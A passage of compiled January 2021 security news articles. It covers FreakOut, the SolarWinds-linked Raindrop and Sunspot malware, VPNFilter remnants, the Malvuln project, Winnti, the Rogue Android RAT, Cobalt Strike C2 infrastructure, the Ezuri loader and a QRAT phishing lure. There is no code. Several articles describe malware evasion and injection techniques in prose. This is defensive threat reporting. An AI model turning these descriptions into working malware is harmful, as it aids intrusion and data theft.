Finally attackers target a critical deserialization of untrusted data issue (CVE-2020-7961) in Liferay Portal, a free, open-source enterprise portal, with features for developing web portals and websites. Affected are versions prior to 7.2.1 CE GA2; an update is available in Liferay Portal 7.2 CE GA2 (7.2.1) or later.
“Patches are available for all products impacted in these CVEs, and users of these products are advised to urgently check any of these devices they are using and to update and patch them to close off these vulnerabilities,” said researchers.
Attack Surface
Researchers said that after exploiting one of these critical
flaws, attackers then upload an obfuscated Python script called out.py,
downloaded from the site https://gxbrowser[.]net.
“After the script is downloaded and given permissions (using the ‘chmod’ command), the attacker tries to run it using Python 2,” they said. “Python 2 reached EOL (end-of-life) last year, meaning the attacker assumes the victim’s device has this deprecated product installed.”
freakout malware
The top industries targeted by the Freakout malware. Credit:
Check Point
This script has varying capabilities, including a port scanning feature, the ability to collect system fingerprints (such as device addresses and memory information), creating and sending packets and brute-force abilities using hard-coded credentials to infect other network devices.
According to a deep dive of the attackers’ main command and control (C2) server, an estimated 185 devices have been hacked thus far.
Researchers said that between Jan. 8 and Jan. 13 they observed 380 (blocked) attack attempts against customers. Most of these attempts were in North America and Western Europe, with the most targeted industries being finance, government and healthcare organizations.
To protect against FreakOut, researchers recommend Linux device users that utilize TerraMaster TOS, Zend Framework or Liferay Portal make sure they have deployed all patches.
“We strongly recommend users check and patch their servers and Linux devices in order to prevent the exploitation of such vulnerabilities by FreakOut,” they said.
Raindrop, a fourth malware employed in SolarWinds attacks
20.1.2021
Virus
Securityaffairs
The threat actors behind the SolarWinds attack used malware dubbed Raindrop for
lateral movement and deploying additional payloads.
Security experts from
Symantec revealed that threat actors behind the SolarWinds supply chain attack
leveraged a malware named Raindrop for lateral movement and deploying additional
payloads.
Raindrop is the fourth malware that was discovered investigating the SolarWinds
attack after the SUNSPOT backdoor, the Sunburst/Solorigate backdoor and the
Teardrop tool.
Raindrop (Backdoor.Raindrop) is a loader that was used by
attackers to deliver a Cobalt Strike payload. Raindrop is similar to the
Teardrop tool, but while the latter was delivered by the initial Sunburst
backdoor, the former was used for spreading across the victim’s network.
“Symantec has seen no evidence to date of Raindrop being delivered directly by Sunburst. Instead, it appears elsewhere on networks where at least one computer has already been compromised by Sunburst.” reads a blog post published by Symantec.
Symantec investigated four Raindrop infections until today, the malware was employed in the last phases of the attacks against a very few selected targets.
Both Raindrop and Teardrop are used to deploy Cobalt Strike Beacon, but they use
different packers and different Cobalt Strike configurations.
“To date,
Symantec has seen four samples of Raindrop. In three cases, Cobalt Strike was
configured to use HTTPS as a communication protocol. In the fourth it was
configured to use SMB Named Pipe as a communication protocol.” continues the
post.
“All three Raindrop samples using HTTPS communication follow very similar configuration patterns as previously seen in one Teardrop sample.”
In the following tables there are key differences between the two tools:
TEARDROP RAINDROP
PAYLOAD FORMAT Custom, reusing features from PE format. It
may be possible to reuse the packer with a range of different payloads supplied
as PE DLLs with automatic conversion. Shellcode only.
PAYLOAD EMBEDDING
Binary blob in data section. Steganography, stored at pre-determined locations
within the machine code.
PAYLOAD ENCRYPTION visualDecrypt combined with XOR
using long key. AES layer before decompression; separate XOR layer using one
byte key after decompression.
PAYLOAD COMPRESSION None. LZMA.
OBFUSCATION
Reading JPEG file. Inserted blocks of junk code, some could be generated using a
polymorphic engine. Non-functional code to delay execution.
EXPORT NAMES
Export names vary, in some cases names overlapping with Tcl/Tk projects. Export
names overlap with Tcl/Tk projects.
STOLEN CODE Byte-copy of machine code
from pre-existing third-party components. The original code is distributed in
compiled format only. Recompiled third-party source code.
The report
published by Symantec includes IoCs and Yara Rules.
Hundreds of Networks Still Host Devices Infected With VPNFilter Malware
20.1.2021
Virus
Securityweek
The VPNFilter malware is still present in hundreds of networks and malicious actors could take control of the infected devices, according to researchers at cybersecurity firm Trend Micro.
Identified in 2018 and mainly focusing on Ukraine, VPNFilter rose to fame quickly due to the targeting of a large number of routers and network-attached storage (NAS) devices from ASUS, D-Link, Huawei, Linksys, MikroTik, Netgear, QNAP, TP-Link, Ubiquiti, UPVEL, and ZTE.
Believed to be operated by Russian threat actor Sofacy, with possible involvement from Sandworm, VPNFilter emerged as a major threat right from the start: 50 impacted device models, the potential to compromise critical infrastructure, and approximately 500,000 bots observed across 54 countries.
Deep analysis of the malware revealed extensive capabilities: various modules allow it to map networks, exploit endpoints connected to infected devices, exfiltrate data, encrypt communications with the command and control (C&C) server, find additional victims, and create a network of proxies for future abuse.
VPNFilter first attempts to obtain the address of its C&C server from an image hosted on Photobucket. If that fails, it attempts to obtain the C&C address from toknowall[.]com, and if that also fails, it monitors incoming packets for a specially crafted TCP packet containing the IP of the C&C server.
In an effort to determine whether the botnet continues to pose a real threat after more than two years since the initial attacks, Trend Micro’s security researchers reached out to the Shadowserver Foundation, which, in collaboration with Cisco Talos, the FBI, and the US Department of Justice, has sinkholed toknowall[.]com.
Data gathered from the sinkhole shows that 5,447 unique devices are still connecting to the domain, meaning that they are still infected. The number of infections, however, is believed to be higher, as the domain might be blocked at DNS level.
“It is important to remember that because these are routers and other similar types of devices, this number also represents thousands of infected networks, not simply individual machines. This means that the reach and visibility for attackers with a botnet like this can be substantial,” Trend Micro says.
The security researchers also decided to check if it would be possible to feed a new IP address to infected devices, to see how many of them were still waiting for a second-stage payload. They crafted a packet, sent it, and noticed that 1,801 networks did respond to it, while 363 of the networks reached back to the sinkhole on port TCP 443.
“Although only 363 networks connected back to our sinkhole, we cannot assume that the 1,801 networks that gave us an initial positive response are clean. They might still be infected by VPNFilter, but the connection to our sinkhole could have been blocked if they are behind a firewall,” Trend Micro says.
The networks that reached out, the researchers say, can easily be taken over by any threat actor with knowledge of how the VPNFilter malware works, and there’s nothing to prevent that, from a technical perspective. The original actor too can regain control of these devices at any point in time, the researchers say.
The problem, Trend Micro explains, could be addressed through firmware updates, especially since the malware has been around for so long, and solutions to remedy infections do exist. Simply restarting the infected devices, however, won’t solve the issue, as initially believed.
VPNFilter, the researchers believe, will continue to lurk around until the infected devices are replaced, as many of them lack an automated firmware update system, meaning that users have to manually update them, provided that they indeed have access to the routers to perform the update and that the vendor has issued a patch.
SolarWinds Hackers Used 'Raindrop' Malware for Lateral Movement
20.1.2021
Virus
Securityweek
The threat group behind the supply chain attack that targeted Texas-based IT management company SolarWinds leveraged a piece of malware named Raindrop for lateral movement and deploying additional payloads, Broadcom-owned cybersecurity firm Symantec reported on Tuesday.
The SolarWinds attack involved the delivery of trojanized updates for Orion, an IT monitoring product, to as many as 18,000 of the company’s customers. These malicious updates delivered a piece of malware named Sunburst, which the attackers inserted into the Orion product using another piece of malware, named Sunspot.
In the case of a few hundred victims that presented an interest to them, including government and high-profile private organizations, the hackers also delivered a piece of malware named by researchers Teardrop, which in turn attempted to deploy a custom version of Cobalt Strike's Beacon payload.
According to Symantec, the attackers also used another tool — very similar to Teardrop — for lateral movement and to deliver the same Cobalt Strike payload. Raindrop, described by the company as a loader and tracked as Backdoor.Raindrop, was spotted on compromised networks but, unlike Teardrop, it doesn’t appear to have been delivered directly by Sunburst.
“Raindrop appears to have been used for spreading across the victim’s network. Symantec has seen no evidence to date of Raindrop being delivered directly by Sunburst. Instead, it appears elsewhere on networks where at least one computer has already been compromised by Sunburst,” Symantec said in a blog post.
On devices infected with Raindrop, the company also noticed tools that can be used to obtain passwords and keys, and saw the execution of PowerShell commands with the goal of executing instances of Raindrop on other devices on the network.
While Raindrop is similar to Teardrop, Symantec says they use different packers and there are differences in Cobalt Strike configurations. In one instance, Cobalt Strike was configured to use SMB Named Pipe as a communications protocol rather than HTTPS, which led experts to believe that the compromised device did not have direct access to the internet, forcing the attackers to route C&C communications through another computer on the network.
The U.S. government and others said Russia was likely behind the attack on SolarWinds. Kaspersky recently found a link between the Sunburst malware and Kazuar, a piece of malware previously connected to a Russian cyberspy group known as Turla.
Researchers Discover Raindrop — 4th Malware Linked to the SolarWinds Attack
20.1.2021
Virus
Thehackernews
Cybersecurity
researchers have unearthed a fourth new malware strain—designed to spread the
malware onto other computers in victims' networks—which was deployed as part of
the SolarWinds supply chain attack disclosed late last year.
Dubbed "Raindrop" by Broadcom-owned Symantec, the malware joins the likes of other malicious implants such as Sunspot, Sunburst (or Solorigate), and Teardrop that were stealthily delivered to enterprise networks.
The latest finding comes amid a continued probe into the breach, suspected to be of Russian origin, that has claimed a number of U.S. government agencies and private sector companies.
"The discovery of Raindrop is a significant step in our investigation of the SolarWinds attacks as it provides further insights into post-compromise activity at organizations of interest to the attackers," Symantec researchers said.
The cybersecurity firm said it discovered only four samples of Raindrop to date that were used to deliver the Cobalt Strike Beacon — an in-memory backdoor capable of command execution, keylogging, file transfer, privilege escalation, port scanning, and lateral movement.
Symantec, last month, had uncovered more than 2,000 systems belonging to 100 customers that received the trojanized SolarWinds Orion updates, with select targets infected with a second-stage payload called Teardrop that's also used to install the Cobalt Strike Beacon.
"The way Teardrop is built, it could have dropped anything; in this case, it dropped Beacon, a payload included with Cobalt Strike," Check Point researchers said, noting that it was possibly done to "make attribution harder."
"While Teardrop was used on computers that had been infected by the original
Sunburst Trojan, Raindrop appeared elsewhere on the network, being used by the
attackers to move laterally and deploy payloads on other computers."
It's worth noting that the attackers used the Sunspot malware exclusively against SolarWinds in September 2019 to compromise its build environment and inject the Sunburst Trojan into its Orion network monitoring platform. The tainted software was then delivered to 18,000 of the company's customers.
Microsoft's analysis of the Solorigate modus operandi last month found that the operators carefully chose their targets, opting to escalate the attacks only in a handful of cases by deploying Teardrop based on intel amassed during an initial reconnaissance of the target environment for high-value accounts and assets.
Now Raindrop ("bproxy.dll") joins the mix. While both Teardrop and Raindrop act as a dropper for the Cobalt Strike Beacon, they also differ in a number of ways.
For a start, Teardrop is delivered directly by the initial Sunburst backdoor, whereas Raindrop seems to have been deployed with the goal of spreading across the victims' network. What's more, the malware shows up on networks where at least one computer has already been compromised by Sunburst, with no indication that Sunburst triggered its installation.
The two malware strains also use different packers and Cobalt Strike configurations.
Symantec did not identify the organizations impacted by Raindrop but said the samples were found in a victim system that was running computer access and management software and on a machine that was found to execute PowerShell commands to infect additional computers in the organization with the same malware.
Expert launched Malvuln, a project to report flaws in malware
16.1.2021
Virus
Securityaffairs
The researcher John Page launched malvuln.com, the first website exclusively
dedicated to the research of security flaws in malware codes.
The security
expert John Page (aka hyp3rlinx) launched malvuln.com, the first platform
exclusively dedicated to the research of security flaws in malware codes.
The news was first announced by SecurityWeek, the researcher explained that Malvuln is the first website dedicated to research and analysis of vulnerabilities in malware samples.
“malvuln.com is the first website exclusively dedicated to the research of security vulnerabilities within Malware itself.” wrote the expert. “There are many websites already offering information about Malware like Hashes, IOC, Reversing etc. However, none dedicated to research and analysis of vulnerabilities within Malware samples… until now. Long Live MALVULN.”
Sharing the knowledge of vulnerabilities affecting malware could allow incident response teams to neutralize the threat in case of infections, but could also help vxers to address them end improve their malware. For this reason, it is likely that Page will regulate the vulnerability disclosure process in the future.
This is a great initiative, we have to support it, everyone can get in contact with the expert via Twitter (@malvuln) or Email (malvuln13[at]gmail.com).
Currently, Page is the unique contributor of the Malvuln service, but he could start accepting third-party contributions in the future.
Clearly, the initiative is born for educational and research purposes only.
At the time of writing the site already includes 26 entries related to remotely exploitable buffer overflow flaws and privilege escalation issues. Most of the buffer overflow vulnerabilities could be exploited for remote code execution.
For each flaw reported through the website, the record includes multiple information such as the name of the malware, the MD5 hash, the type of vulnerability, a description of the vulnerability, dropped files, a memory dump, and proof-of-concept (PoC) exploit code.
Malvuln Project Catalogues Vulnerabilities Found in Malware
16.1.2021
Virus
Securityweek
A researcher has launched Malvuln, a project that catalogues vulnerabilities discovered in malware and provides information on how those vulnerabilities can be exploited.
Malvuln is the creation of security researcher John Page (aka hyp3rlinx), who told SecurityWeek that he came up with the idea when he got bored during a COVID-19 lockdown.
The Malvuln website currently has 26 entries describing remotely exploitable buffer overflow vulnerabilities and privilege escalation flaws related to insecure permissions. The list of targeted malware includes backdoors and trojans, as well as one email worm (Zhelatin). A vast majority of the buffer overflow bugs can be exploited for remote code execution, the expert said.
Each entry contains the name of the malware, its associated hash, the type of vulnerability, a brief description of the flaw, dropped files, a memory dump, and proof-of-concept (PoC) exploit code.
The researcher said he found all the vulnerabilities currently in the Malvuln database himself, but he suggested on Twitter that at some point — depending on where the project goes — he could also start accepting third-party contributions.
Page told SecurityWeek that the information hosted on Malvuln could turn out to be useful to incident response teams to “eradicate a malware without touching the machine if it's a remote exploit.” He added that it “may eventually pit a malware vs malware situation.”
He hopes that the project will be useful to the infosec community, but others caution that it could also help bad actors. Greg Leah, director of threat intelligence at attribution intelligence and response firm HYAS, says the information could also be useful to malware developers and it could hamper ongoing research into malicious activity.
Researchers Disclose Undocumented Chinese Malware Used in Recent Attacks
16.1.2021
Virus
Thehackernews
Cybersecurity
researchers have disclosed a series of attacks by a threat actor of Chinese
origin that has targeted organizations in Russia and Hong Kong with malware —
including a previously undocumented backdoor.
Attributing the campaign to Winnti (or APT41), Positive Technologies dated the first attack to May 12, 2020, when the APT used LNK shortcuts to extract and run the malware payload. A second attack detected on May 30 used a malicious RAR archive file consisting of shortcuts to two bait PDF documents claimed to be a curriculum vitae and an IELTS certificate.
The shortcuts themselves contain links to pages hosted on Zeplin, a legitimate collaboration tool for designers and developers that are used to fetch the final-stage malware that, in turn, includes a shellcode loader ("svchast.exe") and a backdoor called Crosswalk ("3t54dE3r.tmp").
Crosswalk, first documented by FireEye in 2017, is a bare-bones modular backdoor
capable of carrying out system reconnaissance and receiving additional modules
from an attacker-controlled server as shellcode.
While this modus operandi shares similarities with that of the Korean threat group Higaisa — which was found exploiting LNK files attached in an email to launching attacks on unsuspecting victims in 2020 — the researchers said the use of Crosswalk suggests the involvement of Winnti.
This is also supported by the fact that the network infrastructure of the samples overlaps with previously known APT41 infrastructure, with some of the domains traced back to Winnti attacks on the online video game industry in 2013.
The new wave of attacks is no different. Notably, among the targets include Battlestate Games, a Unity3D game developer from St. Petersburg.
Furthermore, the researchers found additional attack samples in the form of RAR files that contained Cobalt Strike Beacon as the payload, with the hackers in one case referencing the U.S. protests related to the death of George Floyd last year as a lure.
In another instance, Compromised certificates belonging to a Taiwanese company
called Zealot Digital were abused to strike organizations in Hong Kong with
Crosswalk and Metasploit injectors, as well as ShadowPad, Paranoid PlugX, and a
new .NET backdoor called FunnySwitch.
The backdoor, which appears to be still under development, is capable of collecting system information and running arbitrary JScript code. It also shares a number of common features with Crosswalk, leading the researchers to believe that they were written by the same developers.
Previously, Paranoid PlugX had been linked to attacks on companies in the video games industry in 2017. Thus, the deployment of the malware via Winnti's network infrastructure adds credence to the "relationship" between the two groups.
"Winnti continues to pursue game developers and publishers in Russia and elsewhere," the researchers concluded. "Small studios tend to neglect information security, making them a tempting target. Attacks on software developers are especially dangerous for the risk they pose to end users, as already happened in the well-known cases of CCleaner and ASUS."
Sunspot, the third malware involved in the SolarWinds supply chain attack
13.1.2021
Virus
Securityaffairs
Cybersecurity firm CrowdStrike announced to have discovered a third malware
strain, named Sunspot, directly involved in the SolarWinds supply chain attack.
According to a new report published by the cybersecurity firm Crowdstrike, a
third malware, dubbed SUNSPOT, was involved in the recently disclose SolarWinds
supply chain attack.
SUNSPOT was discovered after the Sunburst/Solorigate backdoor and Teardrop malware, but chronologically it may have been the first code to be involved in the attack.
At the time of the report, CrowdStrike does not attribute any of the three implants to any known threat actors.
CrowdStrike tracks the threat actor behind the SolarWinds attack as StellarParticle, while FireEye and Microsoft identified it as UNC2452, and Volexity as DarkHalo.
SUNSPOT is used by the attackers to insert the SUNBURST backdoor into software builds of the SolarWinds Orion IT management product.
“SUNSPOT monitors running processes for those involved in compilation of the Orion product and replaces one of the source files to include the SUNBURST backdoor code.” states the report published by the security firm.
“Several safeguards were added to SUNSPOT to avoid the Orion builds from failing, potentially alerting developers to the adversary’s presence.”
Once a build command was detected by the SUNSPOT, it would insert the malicious code in the Orion app building a tainted version of the legitimate software.
Threat actors spent a significant effort in developing the code of SUNSPOT to ensure the stealth injection of the malicious code.
“When SUNSPOT finds the Orion solution file path in a running MsBuild.exe process, it replaces a source code file in the solution directory, with a malicious variant to inject SUNBURST while Orion is being built. While SUNSPOT supports replacing multiple files, the identified copy only replaces InventoryManager.cs.” continues the report.
The report published by CrowdStrike includes Indicators of Compromise (IoCs) and Yara rules to detect this new strain of malware.
SolarWinds also published an update on the attack, it revealed that the malware was deployed to customers between March and June 2020, but the threat actors executed a test run between September and November 2019.
“Our current timeline for this incident begins in September 2019, which is the
earliest suspicious activity on our internal systems identified by our forensic
teams in the course of their current investigations.” reads the update provided
by SolarWinds. “The subsequent October 2019 version of the Orion Platform
release appears to have contained modifications designed to test the
perpetrators’ ability to insert code into our builds”
'Sunspot' Malware Used to Insert Backdoor Into SolarWinds Product in Supply
Chain Attack
13.1.2021
Virus
Securityweek
CrowdStrike, one of the cybersecurity companies called in by IT management firm SolarWinds to investigate the recently disclosed supply chain attack, on Monday shared details about a piece of malware used by the attackers to insert a backdoor into SolarWinds’ Orion product.
According to CrowdStrike, the threat group behind the attack on SolarWinds used a piece of malware named Sunspot to inject the previously analyzed Sunburst backdoor into the Orion product without being detected.
SolarWinds said the attackers created trojanized Orion updates containing the Sunburst backdoor and delivered them to as many as 18,000 customers. However, it appears that only a few hundred of those customers were of interest to the attackers and received secondary payloads, such as the post-exploitation tool named Teardrop.
An analysis conducted by CrowdStrike revealed that the hackers deployed Sunspot on SolarWinds systems. Sunspot is designed to check every second for the presence of processes associated with the compilation of the Orion product on the compromised system. If such a process is detected, Sunspot replaces a single source code file to include the Sunburst backdoor.
Specifically, Sunspot looks for the MsBuild.exe process, which is associated with Microsoft Visual Studio development tools. If the process is detected, it attempts to determine if it’s being used to build Orion software.
“When SUNSPOT finds the Orion solution file path in a running MsBuild.exe process, it replaces a source code file in the solution directory, with a malicious variant to inject SUNBURST while Orion is being built,” CrowdStrike explained. “While SUNSPOT supports replacing multiple files, the identified copy only replaces InventoryManager.cs.”
CrowdStrike said the attackers sanitized the Sunburst source code and took other steps to increase their chances of avoiding detection by SolarWinds.
“The malicious source code for SUNBURST, along with target file paths, are stored in AES128-CBC encrypted blobs and are protected using the same key and initialization vector,” the company explained. “As causing build errors would very likely prompt troubleshooting actions from the Orion developers and lead to the adversary’s discovery, the SUNSPOT developers included a hash verification check, likely to ensure the injected backdoored code is compatible with a known source file, and also avoid replacing the file with garbage data from a failed decryption.”
After the SolarWinds breach came to light, many have been wondering exactly who was behind the attack. The U.S. government said it was likely Russia and some reports claimed it may have been the Russia-linked threat group known as APT29 and Cozy Bear. However, CrowdStrike says it currently does not attribute any of the malware used in the SolarWinds attack to a known threat actor, and it has decided to track the campaign as an activity cluster named StellarParticle.
CrowdStrike has made available indicators of compromise (IoC) and information on the tactics, techniques and procedures (TTP) associated with the Sunspot activity.
Also on Monday, Kaspersky reported finding some links between the Sunburst malware, including similarities in code and development choices, and Kazuar, a .NET backdoor that has been around since at least 2015 and which has been attributed to the Russian cyberspy group Turla. However, Kaspersky says it’s unclear if Kazuar and Sunburst have been developed by the same group.
Experts Sound Alarm On New Android Malware Sold On Hacking Forums
13.1.2021
Virus
Thehackernews
Cybersecurity
researchers have exposed the operations of an Android malware vendor who teamed
up with a second threat actor to market and sell a remote access Trojan (RAT)
capable of device takeover and exfiltration of photos, locations, contacts, and
messages from popular apps such as Facebook, Instagram, WhatsApp, Skype,
Telegram, Kik, Line, and Google Messages.
The vendor, who goes by the name of "Triangulum" in a number of darknet forums, is alleged to be a 25-year-old man of Indian origin, with the individual opening up shop to sell the malware three years ago on June 10, 2017, according to an analysis published by Check Point Research today.
"The product was a mobile RAT, targeting Android devices and capable of exfiltration of sensitive data from a C&C server, destroying local data – even deleting the entire OS, at times," the researchers said.
An Active Underground Market for Mobile Malware
Piecing together Triangulum's
trail of activities, the cybersecurity firm said the malware developer — aside
from drumming up publicity for the RAT — also looked for potential investors and
partners in September 2017 to show off the tool's features before offering the
malware for sale.
Triangulum, subsequently, is believed to have gone off the grid for about a
year-and-a-half, with no signs of activity on the darknet, only to resurface on
April 6, 2019, with another product called "Rogue," this time in collaboration
with another adversary named "HeXaGoN Dev," who specialized in the development
of Android-based RATs.
Noting that Triangulum had previously purchased several malware products offered by HeXaGoN Dev, Check Point said Triangulum advertised his products on different darknet forums with well-designed infographics listing the full features of the RAT. Furthermore, HeXaGoN Dev posed as a potential buyer in a bid to attract more customers.
While the 2017 product was sold for a flat $60 as a lifetime subscription, the vendors pivoted to a more financially-viable model in 2020 by charging customers anywhere between $30 (1 month) to $190 (permanent access) for the Rogue malware.
Interestingly, Triangulum's attempts to expand to the Russian darknet market were met with failure following the actor's refusal to share demo videos on the forum post advertising the product.
From Cosmos to Dark Shades to Rogue
Rogue (v6.2) — which appears to be the
latest iteration of a malware called Dark Shades (v6.0) that initially sold by
HeXaGoN Dev before being purchased by Triangulum in August 2019 — also comes
with features taken from a second malware family called Hawkshaw, whose source
code became public in 2017.
"Triangulum didn't develop this creation from scratch, he took what was
available from both worlds, open-source and the darknet, and united these
components," the researchers said.
Dark Shades, as it turns out, is a "superior successor" to Cosmos, a separate RAT sold by the HeXaGoN Dev actor, thus making the sale of Cosmos redundant.
Rogue is marketed as a RAT "made to execute commands with incredible features without a need of computer (sic)," with additional capabilities to control the infected clients remotely using a control panel or a smartphone.
Indeed, the RAT boasts of a wide range of features to gain control over the host device and exfiltrate any kind of data (such as photos, location, contacts, and messages), modify the files on the device, and even download additional malicious payloads, while ensuring that the user grants intrusive permissions to carry out its nefarious activities.
It's also engineered to thwart detection by hiding the icon from the user's device, circumvent Android security restrictions by exploiting accessibility features to log user actions, and registers its own notification service to snoop on every notification that pops up on the infected phone.
What's more, stealth is built into the tool. Rogue uses Google's Firebase infrastructure as a command-and-control (C2) server to disguise its malicious intentions, abusing the platform's cloud messaging feature to receive commands from the server, and Realtime Database and Cloud Firestore to upload amassed data and documents from the victim device.
Rogue Suffered a Leak in April 2020
Triangulum may be currently active and
expanding his clientele, but in April 2020, the malware ended up getting leaked.
ESET researcher Lukas Stefanko, in a tweet on April 20 last year, said the backend source code of the Rogue Android botnet was published in an underground forum, noting "it has lot of security issues," and that "it is new naming for Dark Shades V6.0 (same developer)."
But despite the leakage, Check Point researchers note that the Triangulum team still receives messages on the actor's home Darknet forum from interested customers.
"Mobile malware vendors are becoming far more resourceful on the dark net. Our research gives us a glimpse into the craziness of the dark net: how malware evolves, and how difficult it is to now track, classify and protect against them in an effective way," Check Point's Head of Cyber Research, Yaniv Balmas, said.
"The underground market is still like the wild-west in a sense, which makes it very hard to understand what is a real threat and what isn't."
Malicious Software Infrastructure Easier to Get and Deploy Than Ever
9.1.2021
Virus
Threatpost
Researchers at Recorded
Future report a rise in cracked Cobalt Strike and other open-source adversarial
tools with easy-to-use interfaces.
Simple to use and deploy offensive security tools, making it easier than ever for criminals with little technical know-how to get in on cybercrime are seeing a significant rise, researchers say.
Recorded Future just released findings from its regular year-end observations of malicious infrastructure, identifying more than 10,000 unique command and control (C2) servers, across 80 malware families — nearly all linked to advanced persistent threat (APT) groups or “high-end financial actors.”
Recorded Future’s 2020 Adversary Infrastructure Report explained that researchers anticipate increased adoption of open-source tools because they’re easy to use and accessible to criminals without deep technical expertise.
“Over the next year, Recorded Future expects further adoption of open-source tools that have recently gained popularity, specifically Covenant, Octopus C2, Sliver and Mythic,” the report said. “Three of these tools have graphical user interfaces, making them easier to use for less experienced operators and all four have verbose documentation on their uses.”
Open Source and Cobalt Strike Dominate
Researchers go on to explain that
since the Cobalt Strike source code leaked last November on GitHub, it has
increased in use, and that cracked or trial versions were largely being used by
notable APTs including APT41, Mustang Panda, Ocean Lotus and FIN7. Cobalt Strike
was also was linked to the highest number of observed C2 servers last year, the
report said.
Cobalt Strike is a penetration-testing tool, which is commercially available. It sends out beacons to detect network vulnerabilities. When used for its intended purpose, it simulates an attack. Threat actors have since figured out how to turn it against networks to exfiltrate data, deliver malware and create fake C2 profiles which look legit and avoid detection.
Cobalt Strike was used with 1,441 observed C2 servers in 2020, according to Recorded Future, followed by Metasploit with 1,122 and PupyRat with 454.
“The most commonly observed families were dominated by open-source or commercially available tooling,” the report said. “Detections of unaltered Cobalt Strike deployments (the pre-configured TLS certificate, Team Server administration port, or telltale HTTP headers) represented 13.5 percent of the total C2 servers identified. Metasploit and PupyRAT represented the other top open-source command-and-control servers identified by Recorded Future.”
Links to APTs
The report added that nearly every observed offensive security
tool (OST), including Cobalt Strike and others, can be traced back to attacks
from APT actors.
“Nearly all of the OSTs detected by Recorded Future have been linked to APT or high-end financial actors,” the report said. “The ease of access and use of these tools, mixed with the murkiness of potential attribution, makes them appealing for unauthorized intrusions and red teams alike.”
The APT threat landscape overall has gotten more complex over the past year, according to Kaspersky’s 2020 APT trends report thanks to widespread innovation across APT groups with varying tactics, techniques and procedures (TTPs).
Once researchers were able to identify the C2 servers, they traced those back to 576 different hosting providers. Amazon hosted the most with 471, or about 3.8 percent. Fellow U.S.-based host Digital Ocean came in second on the list with 421. The report explained that’s not necessarily a red flag.
“The deployment of Cobalt Strike and Metasploit controllers on these providers is not indicative of malpractice or negligent hosting but is more likely due to authorized red teams using these tools on cloud infrastructure,” the report said.
Recorded Future explained the point of this ongoing malicious infrastructure audit is to help security teams identify actors as they’re setting up, rather than waiting for them to get up and running and able to strike. The report found teams have what amounts to about a 61-day lead time from when a C2 server is created to when it’s detectable. The report adds the average time these servers host malicious infrastructure is 54.8 days.
But detection before malicious infrastructure can be used creates an opportunity to stop threat actors before they can cause damage, according to Recorded Future.
“Before a server can be used by a threat actor, it has to be acquired, either via compromise or legitimate purchase,” Recorded Future explained. “Then, the software must be installed, configurations must be tuned and files added to the server. The actors must access it via panel login, SSH or RDP protocols, and then expose the malware controller on a port to allow the data to transfer from the victim and to administer commands to infections. Only then can the server be used for malicious purposes.”
Ezuri memory loader used in Linux and Windows malware
9.1.2021
Virus
Securityaffairs
Multiple threat actors have recently started using the Ezuri memory loader as a
loader to executes malware directly into the victims’ memory.
According to
researchers from AT&T’s Alien Labs, malware authors are choosing the Ezuri
memory loader for their malicious codes.
The Ezuri memory loader tool allows to load and execute a payload directly into the memory of the infected machine, without writing any file to disk.
Experts pointed out that while this technique common in Windows malware, it is rare in Linux attacks.
“The loader decrypts the malicious malware and executes it using memfd create (as described in this blog in 2018). When creating a process, the system returns a file descriptor to an anonymous file in ‘/proc/PID/fd/’ which is visible only in the filesystem.” reads the post published by AT&T’s Alien Labs.
The loader observed by the researchers in the attacks is written in Golang and borrows the Ezuri code published on GitHub by the user guitmz in March 2019. The user describes its project as a simple Linux ELF Runtime crypter, he wrote the code to demonstrate how to execute the ELF binary files from memory with memfd_create syscall.
The guitmz user also tested its code against VirusTotal to prove that it is able to avoid detection, in particular, he demonstrated that was able to obtain zero rate detection for a known Linux.Cephei sample once it was injected using the Ezuri code (ddbb714157f2ef91c1ec350cdf1d1f545290967f61491404c81b4e6e52f5c41f).
Upon executing the code, it will ask the user the path for the payload to be encrypted and the password to be used for AES encryption to hide the malware within the loader. In case, the password is not provided, the tool generates one. Then the packer compiles the loader with the payload encrypted within it, so it can be decrypted and executed in memory once it is delivered in the targeted system.
In August, the user ‘TMZ,’ likely associated with ‘guitmz,’ posted the same code
on a forum where members shared malware.
Researchers from AT&T Alien Labs have identified several malware authors leveraging the Ezuri loader in the last few months, one of them is a threat actor tracked as TeamTNT that has been active since at least since 2020,
The TeamTNT botnet is a crypto-mining malware operation that has been active since April and that targets Docker installs, it is the first cryptomining bot that steals AWS credentials
Experts noticed that the group also used the Ezuri loader that is similar to the
original one.
“In October 2020, Palo Alto Networks Unit42 identified new
variants of the cryptomining malware used by TeamTNT named “Black-T.” This
sample first installs three network scanners, and then inspects memory in an
attempt to retrieve any type of credentials located in the memory. Additionally,
Unit42 identified several German-language strings in some of the TNT scripts.”
continues the report.
“The last sample identified by Palo Alto Networks Unit42 is actually an Ezuri loader. The decrypted payload is an ELF file packed with UPX, which is a known sample from TeamTNT, first seen in June 2020 (e15550481e89dbd154b875ce50cc5af4b49f9ff7b837d9ac5b5594e5d63966a3).”
In conclusion, the use of this packer is popular for vxers, such as the
technique described to load the ELF binaries into memory. Ezuri allows malware
authors to improve their operations, increasing the evasion capabilities of
known payloads.
“Several malware authors have been using an open source
Golang tool to act as a malware loader, using a known technique to load the ELF
binaries into memory and avoid using easy-to-detect files on disk.” concludes
the report. “The authors use the open source tool Ezuri, to load its previously
seen payloads and avoid antivirus detections on the file.”
It’s Not the Trump Sex Tape, It’s a RAT
7.1.2021
Virus
Threatpost
Criminals are using the end of the Trump presidency to deliver a new remote-access trojan (RAT) variant disguised as a sex video of the outgoing POTUS, researchers report.
As outgoing President Donald Trump continues to dominate headlines, cybercriminals have decided to horn in on the much-gossiped-about — and yet to materialize — Trump sex tape as a lure for malware delivery.
A campaign has been uncovered that labels a malware downloader with the filename “TRUMP_SEX_SCANDAL_Video,” according to a new report from Trustwave researchers. It’s being spread via malicious links in emails.
If clicked, the links don’t take the user to a salacious video, but instead install QRAT, providing criminals with total remote access of an infected system.
QRAT
First discovered in 2015, the Quaverse Remote Access Trojan (QRAT) is
Java-based, remote access trojan (RAT) supercharged by plug-ins from Quaverse,
Trustwave explained.
Starting last August, Trustwave researchers reported seeing an uptick in
phishing scams trying to push QRAT. This latest phishing attempt in interesting
though, according to Trustwave researcher Diana Lopera, because the subject line
and the filename were unrelated.
“The email, with the subject “GOOD LOAN
OFFER!!,” at first glance, looks like a usual investment scam,” Lopera said in
the report about the find. “No obfuscation in the email headers or body is
found. Interestingly, attached to the email is an archive containing a Java
Archive (JAR) file called “TRUMP_SEX_SCANDAL_VIDEO.jar.”
Lopera added recent headlines surrounding the election provided plenty of cover for malicious actors to conduct their scams.
